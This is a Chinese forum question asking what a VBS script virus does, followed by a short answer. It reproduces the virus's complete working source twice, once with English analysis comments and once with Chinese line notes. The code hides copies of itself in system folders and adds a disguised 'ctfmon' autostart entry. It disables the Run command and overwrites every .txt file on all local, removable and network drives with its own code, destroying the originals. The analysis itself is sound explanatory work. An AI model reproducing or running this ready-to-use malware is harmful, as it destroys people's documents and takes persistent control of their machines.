这是vbs脚本病毒,哪位高手解释下什么意思?

'Ycosxhack [Y.X.H]
' Analysis notes (main script body). In order, the script:
'   1. copies itself under a random numeric name into three special folders,
'   2. writes four registry values (autostart entry, two notice strings, NoRun),
'   3. reads its own source text and walks the drives, calling scan() on each,
'   4. deletes the file it was started from.
' Artifacts visible from this code: <number>.vbs files in the special folders,
' a Run value named "ctfmon" whose data ends in ".vbs", and the NoRun policy value.

' Runtime errors are suppressed from here on; any step that fails is skipped silently.
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
' Random integer in 1..10000000, used as the base file name of the copies.
name=int(rnd*10000000+1)
temp=name
' GetSpecialFolder(0/1/2) = Windows folder, System folder, Temp folder.
' The running script file is copied into each of them as <name>.vbs.
for i=0 to 2
set dir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs")
next
'--------------------------------------------------------
set reg=createobject("wscript.shell")
' Autostart: a value named "ctfmon" under the machine-wide Run key, pointing at the .vbs copy.
' The path is the literal c:\windows\system32, not the folder returned by GetSpecialFolder.
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs"
' Two string values named like a logon notice caption and text ("hack" / "sorry!!!").
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!"
' Explorer policy NoRun=1 (per-user): hides the Run command in the Start menu.
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
'--------------------------------------------------------
' Read the script's own source (mode 1 = ForReading) into the global "cover";
' scan() later writes this text over every .txt file it finds.
set self=fso.opentextfile(wscript.scriptfullname,1)
cover=self.readall
self.close
set drvs=fso.drives
for each drv in drvs
' DriveType 1 = removable, 2 = fixed, 3 = network, 4 = CD-ROM; other types are skipped.
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
'wscript.echo drv
scan(drv)
end if
next
' Force-delete the file the script was launched from; the copies made above remain.
set selfkill=fso.getfile(wscript.scriptfullname)
selfkill.delete(true)
'--------------------------------------------------------
' scan(folder_): recursively walks folder_ and replaces every .txt file with a copy of this script.
'   folder_ - a drive or folder (object or path); it is rebound to a Folder object below.
' Relies on the script-level globals "fso" (FileSystemObject) and "cover" (the script's own source).
' Recovery note: the original text is overwritten before the .vbs copy is made, so the
' resulting <name>.txt.vbs files hold the script, not the user's data; restoring the
' documents requires a backup.
sub scan(folder_)
' Errors (e.g. a folder or file that cannot be opened) are ignored and the walk continues.
on error resume next
set folder_=fso.getfolder(folder_)
set files=folder_.files
for each file in files
' Extension match is case-insensitive.
ext=fso.getextensionname(file)
ext=lcase(ext)
if ext="txt" then
' Mode 2 = ForWriting, create=true: the file's contents are replaced with the script source.
set ap=fso.opentextfile(file.path,2,true)
ap.write cover
ap.close
' Duplicate the overwritten file as <original name>.txt.vbs, then force-delete the .txt.
fso.getfile(file.path).copy(file.path&".vbs")
file.delete(true)
end if
next
' Recurse into every subfolder.
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end sub

'Ycosxhack [Y.X.H]//注释文
on error resume next //跳过错误行
set fso=createobject("scripting.filesystemobject") //设置文件操作
randomize name=int(rnd*10000000+1)//随机大小文件名
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)//获取特殊文件夹
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs") //取得脚本自身的完整路径,并把脚本复制到该特殊文件夹(文件名为随机数.vbs)
next
'--------------------------------------------------------
set reg=createobject("wscript.shell") reg.regwrite//注册表写操作 "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs" //添加启动项
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack" //对话框标题
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!" //对话框内容
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"//禁用桌面(准确地说,NoRun 策略禁用的是开始菜单中的“运行”命令)
'--------------------------------------------------------
set self=fso.opentextfile(wscript.scriptfullname,1) //设置打开文件
cover=self.readall //读取所有内容
self.close //自我关闭
set drvs=fso.drives //驱动操作设置
for each drv in drvs //在drvs中查找驱动
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 //驱动器类型比较(1=可移动磁盘,2=固定磁盘,3=网络驱动器,4=光驱)
then 'wscript.echo drv scan(drv)
end if
next
set selfkill=fso.getfile(wscript.scriptfullname) //文件操作自我删除
selfkill.delete(true) //自我删除
'--------------------------------------------------------
sub scan(folder_)
on error resume next //遇错跳过
set folder_=fso.getfolder(folder_) //获取文件
set files=folder_.files
for each file in files
ext=fso.getextensionname(file) //获取文件扩展名
ext=lcase(ext)
if ext="txt" //判断文件扩展名为txt时
then
set ap=fso.opentextfile(file.path,2,true) //文件操作打开txt文本文件
ap.write cover //写入内容
ap.close //关闭txt文件
fso.getfile(file.path).copy(file.path&".vbs")//转移恶意脚本:把已被覆盖的文件复制为 原文件名.txt.vbs
file.delete(true)//删除原来的 txt 文件(其原有内容此时已被脚本代码覆盖)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders scan(subfolder)
next
end sub//结束
第1个回答  2012-05-17
注册表操作(自启动等等)+文件操作(复制文件到c:\windows\system32\<随机名字>.vbs等等)
